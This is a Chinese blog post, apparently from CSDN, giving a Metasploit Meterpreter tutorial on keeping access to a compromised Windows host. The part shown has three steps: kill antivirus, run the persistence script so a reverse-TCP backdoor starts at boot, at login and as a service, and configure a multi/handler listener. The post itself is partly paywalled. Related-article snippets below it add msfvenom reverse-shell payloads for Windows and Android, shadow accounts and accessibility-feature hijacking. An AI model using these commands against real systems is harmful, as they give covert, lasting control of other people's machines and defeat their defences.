meterpreter后渗透之权限维持

最新推荐文章于 2024-09-25 21:30:12 发布
最新推荐文章于 2024-09-25 21:30:12 发布
阅读量3.1k 收藏 16
点赞数 1
分类专栏: 总结 渗透 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255856/article/details/98983680
版权
本文介绍了如何在Meterpreter会话中创建持久性后门,包括使用msfvenom生成exe和Aspx Meterpreter后门,并详细说明了设置监听和维持权限的步骤。通过创建VBS脚本、PHP和EXE文件,以及Aspx版shellcode,实现系统启动和用户登录时的自动连接。
摘要由CSDN通过智能技术生成

首发于先知社区:https://xz.aliyun.com/t/5951

Persistence后门

使用此方法建议运行前关闭杀毒软件

Run post/windows/manage/killav

输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。
在这里插入图片描述
详细信息如下:

-A 自动启动一个匹配的漏洞/多/处理程序来连接到代理
-L如果不使用%TEMP%,则选择目标主机中写入有效负载的>位置。
-P 有效载荷使用,默认是windows/meterpreter/reverse_tcp。
-S在启动时自动启动代理作为服务(具有系统特权)
-T 选择要使用的可执行模板
-U用户登录时自动启动代理
-X在系统启动时自动启动代理
-h这个帮助菜单
-i每次连接尝试之间的间隔(以秒为单位)
-p 运行Metasploit的系统正在监听的端口
-r 运行Metasploit的系统的IP监听连接返回

可以发现在目标机C:\Windows\TEMP下创建了一个QeVoiKqW.vbs文件

在这里插入图片描述
后使用以下命令设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.130
set lport 6666
run

即可看见已经建立了连接,
持久后门已经创建成功。

在这里插入图片描述
Meterpreter 后门

通过msfvenom工具制作PHP Meterpreter

最低0.47元/天 解锁文章
「已注销」
关注
专栏目录
内网渗透-window权限维持
lza20001103的博客
09-26 2248
window权限维持 文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记 前言 上期讲完了横向移动后,我们拿到了管理员的权限,当我们离开时,下一次要是还想拿到的是管理员的权限呢,难道我们还要继续一波操作提取啥的吗,其实不然,接下来将是最重要的内容,就是我们的权限维持的操作了,对于后渗透有着至关重要的
MSF之meterpreter权限维持
梦想专栏
07-30 2099
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
权限维持——Meterpreter渗透阶段之远程桌面开启
wy的博客
11-25 1910
3.靶机中新建一个账号便于我们登录,并给它分配管理员权限(使用),然后将其添加到"远程桌面用户"组中,首先进入shell。4.在kaili中新建一个终端,利用rdesktop对靶机进行远程桌面连接。学习利用Meterpreter渗透阶段模块来开启靶机远程桌面。5.使用刚创建的用户进行登录:hacker/123123。1.将当前session会话提升到system权限。2.启动目标机的远程桌面协议,对应3389端口。靶机:windows7。
权限维持——Linux
最新发布
weixin_58666006的博客
09-25 938
拿到管理员权限后,为了方便回来,需要留后门进行权限维持;即便是防守方也是需要了解权限维持,因为知己知彼,百战不殆。
渗透阶段的权限维持
Fly_鹏程万里
08-22 2621
前言 当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。 在windows主机中,我总结了下面几种权限维持的方法,不足之处还望各位大佬斧正。 添加影子账户 影子账户可以理解为和主体一模一样但是又看不见的账户,其隐蔽性较好,只能在注册表里面看到。 首先,我们需要创建一个隐藏账号OMG$ 使用命令 net...
十三、权限维持
谢小二的博客
06-12 1332
权限维持
权限维持(什么是后门?如何留后门?)-Windows篇 (゚益゚メ) 渗透测试
寻觅的博客
09-12 2758
来看看如何做开机自启!我们渗透一定要持久!
渗透meterpreter学习笔记
迷风小白
11-08 7876
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 MeterpreterMetasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
全!最新Windows后渗透权限维持
Appleteachers的博客
05-14 477
Windows后渗透权限维持 辅助功能劫持 Windows10 有一些辅助功能。这些功能可以在用户登录之前以组合键启动。根据这个特征,一些恶意软件无需登录到系统,通过远程桌面协议就可以执行恶意代码。 一些常见的辅助功能如: C:\Windows\System32\sethc.exe 粘滞键 快捷键:按五次 shift 键 C:\Windows\System32\utilman.exe 设置中心 快捷键:Windows+U 键 C:\Windows\System32\Magni
Meterpreter渗透工具的高级功能探究
Meterpreter渗透工具简介 MeterpreterMetasploit框架的一部分,是一款功能强大的后渗透工具,广泛应用于渗透测试和攻击中。本章将介绍Meterpreter的基本概念、历史和在渗透测试中的作用。 ## 1.1 Meterpreter...
渗透测试框架权限维持
duan_qiao925的博客
06-19 397
Metasploit权限维持 简单介绍下Metasploit,这是一个渗透测试平台,可以查找、利用、验证漏洞。与Metasploit的大部分交互式通过模块完成的,例如可以通过“auxiliary”模块进行信息收集,使用"exploit"模块进行漏洞利用,利用"payload"模块链接到shell。 生成木马 命令解释 -l, --list <type> 列出指定类型的所有模块 类型包括: payloads, encoders, nops, pla
利用metasploit对手机进行渗透实战
qq_52907838的博客
08-18 3291
第一步:用ifconfig命令查看本机ip地址 第二步:用msfvenom -p命令生成apk木马文件 具体命令为 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk 说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的
Meterpreter提权详解
子曰小玖的博客
08-08 3240
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2438
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机
weixin_29232507的博客
05-13 6434
metasploit入侵安卓手机拿shellKALI IP: 192.168.194.1281.生成木马文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.194.128 LPORT=5555 R > /root/ma.apk// LHOST = KALI IP 。LPORT = 接收的端口 。 /root/ma.apk...
Metasploit后门攻击android
2301_77778745的博客
04-26 441
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
权限维持简单总结
Aiwin的博客
08-17 4546
权限维持简单总结
meterpreter 持久化访问的多种方式
izj007的博客
05-30 6213
meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。 1. 通过persistence脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1
MSF之persistence权限维持
大方子
10-18 2498
首先,我们先生成一个 PAYLOAD :  msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X &gt;xx.exe 接着,我们来配置一个反弹会话的监听处理: use exploit/multi/handler set payload windows/meterp...
meterpreter渗透
04-07
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值